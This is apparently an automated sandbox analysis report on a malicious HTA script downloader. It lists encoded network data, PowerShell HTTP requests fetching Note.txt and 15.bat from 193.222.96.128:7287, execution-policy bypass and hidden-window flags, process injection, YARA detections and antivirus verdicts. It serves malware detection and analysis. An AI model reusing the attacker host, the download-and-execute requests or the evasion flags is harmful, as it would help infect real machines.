Data received	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
Data received	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
Data received	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

Poweshell is sending data to a remote host (2 events)

Data sent	GET /Note.txt HTTP/1.1 Host: 193.222.96.128:7287 Connection: Keep-Alive
Data sent	GET /15.bat HTTP/1.1 Host: 193.222.96.128:7287

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 21, 2024, 12:44 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 21, 2024, 12:44 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win

Communicates with host for which no DNS query was performed (1 event)

host

193.222.96.128

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Roaming\Note.txt
file	C:\Users\test22\AppData\Roaming\15.bat

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
send April 21, 2024, 12:44 p.m.	buffer: GET /Note.txt HTTP/1.1 Host: 193.222.96.128:7287 Connection: Keep-Alive socket: 1432 sent: 77	1	77	0
send April 21, 2024, 12:44 p.m.	buffer: GET /15.bat HTTP/1.1 Host: 193.222.96.128:7287 socket: 860 sent: 51	1	51	0

One or more non-whitelisted processes were created (4 events)

parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\15.bat
parent_process	powershell.exe	martian_process	C:\Users\test22\AppData\Roaming\Note.txt
parent_process	powershell.exe	martian_process	"C:\Windows\system32\NOTEPAD.EXE" C:\Users\test22\AppData\Roaming\Note.txt
parent_process	powershell.exe	martian_process	"C:\Users\test22\AppData\Roaming\15.bat"

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2864 resumed a thread in remote process 2968
NtResumeThread April 21, 2024, 12:44 p.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 2968	1	0	0

Creates a suspicious Powershell process (3 events)

option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-w hidden	value	Attempts to execute command with a hidden window

File has been identified by 24 AntiVirus engines on VirusTotal as malicious (24 events)

Skyhigh	HTA/Downloader.f
ALYac	VB:Trojan.Valyria.7482
VIPRE	VB:Trojan.Valyria.7482
Arcabit	VB:Trojan.Valyria.D1D3A
ESET-NOD32	VBS/Agent.QVR
McAfee	HTA/Downloader.f
Avast	Script:SNH-gen [Drp]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VB:Trojan.Valyria.7482
NANO-Antivirus	Trojan.Script.Downloader.jpdglv
MicroWorld-eScan	VB:Trojan.Valyria.7482
Rising	Downloader.Agent/VBS!8.10EA5 (TOPIS:E0:RXmrIh5jYAI)
Emsisoft	VB:Trojan.Valyria.7482 (B)
F-Secure	Malware.VBS/Dldr.Agent.VPLT
FireEye	VB:Trojan.Valyria.7482
Ikarus	Trojan.VBS.Agent
Google	Detected
Avira	VBS/Dldr.Agent.VPLT
GData	VB:Trojan.Valyria.7482
Varist	VBS/Agent.AZC!Eldorado
MAX	malware (ai score=86)
Fortinet	VBS/Agent.BSD!tr
AVG	Script:SNH-gen [Drp]

The process powershell.exe wrote an executable file to disk which it then attempted to execute (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\notepad.exe

.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All